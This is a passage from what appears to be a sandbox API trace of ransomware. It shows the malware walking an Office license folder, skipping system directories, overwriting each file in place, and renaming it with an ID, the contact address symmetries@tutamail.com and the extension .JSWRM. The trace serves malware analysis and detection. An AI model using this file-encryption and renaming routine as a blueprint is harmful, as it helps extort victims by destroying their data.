dwFlags=0x0, lpWideCharStr="OutlookR_Trial-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241178, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0106.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0106.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0106.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.706] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0106.706] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0106.706] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0106.708] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.708] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0106.708] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.708] CloseHandle (hObject=0x45c) returned 1 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0106.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0106.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0106.709] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0106.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0106.709] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.709] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0106.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0106.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0106.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0106.710] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0106.710] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7c105e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe7c105e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7cf531b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="OU4B3C~1.XRM")) returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.719] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.720] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241358, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2412e0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0106.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0106.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.721] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6795) returned 1 [0106.721] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0106.721] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0106.723] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.723] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0106.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0106.723] CloseHandle (hObject=0x45c) returned 1 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0106.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.723] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0106.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.723] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0106.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0106.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0106.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0106.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0106.724] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8da5b15, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8da5b15, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8e8a938, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d63, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="OU0980~1.XRM")) returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.725] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0106.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0106.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0106.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.726] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11619) returned 1 [0106.726] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0106.726] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0106.729] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.729] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0106.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.729] CloseHandle (hObject=0x45c) returned 1 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0106.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0106.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0106.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0106.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0106.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.730] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0106.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0106.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0106.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.730] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8193c39, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8193c39, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe829ecb0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x258b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OutlookVL_KMS_Client-ul.xrm-ms", cAlternateFileName="OUD3D3~1.XRM")) returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned -1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0106.731] lstrcmpiW (lpString1="OutlookVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutlookVL_KMS_Client-ul.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0106.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0106.731] WideCharToMultiByte (in: CodePage=0xfde9, 